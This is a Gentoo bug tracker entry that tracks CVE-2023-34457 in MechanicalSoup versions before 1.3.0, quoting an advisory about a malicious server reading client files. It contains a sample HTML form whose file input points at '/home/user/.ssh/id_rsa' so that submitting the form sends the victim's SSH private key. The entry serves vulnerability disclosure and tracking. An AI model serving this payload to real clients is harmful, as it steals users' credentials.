909723 – (CVE-2023-34457) <dev-python/MechanicalSoup-1.3.0: Malicious web server can read arbitrary files on client using file input inside HTML form

Bug 909723 (CVE-2023-34457) - <dev-python/MechanicalSoup-1.3.0: Malicious web server can read arbitrary files on client using file input inside HTML form

Summary: <dev-python/MechanicalSoup-1.3.0: Malicious web server can read arbitrary fil...

Status:	IN_PROGRESS

Alias:	CVE-2023-34457

Product:	Gentoo Security
Classification:	Unclassified
Component:	Vulnerabilities (show other bugs)
Hardware:	All Linux

Importance:	Normal minor (vote)
Assignee:	Gentoo Security

URL:	https://github.com/MechanicalSoup/Mec...
Whiteboard:	B4 [glsa?]
Keywords:

Depends on:
Blocks:

Reported:	2023-07-05 06:19 UTC by Michał Górny
Modified:	2023-07-05 15:56 UTC (History)
CC List:	2 users (show)

See Also:
Package list:
Runtime testing required:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Michał Górny archtester

2023-07-05 06:19:26 UTC

Cleanup done already.


Summary
=======

A malicious web server can read arbitrary files on the client using a <input type="file" ...> inside HTML form.

Details
=======

[…]

The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:

<html><body>
  <form method="post" enctype="multipart/form-data">
    <input type="text" name="greeting" value="hello" />
    <input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
  </form>
</body></html>

then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.

Comment 1 John Helmert III archtester

2023-07-05 15:56:58 UTC

Thanks!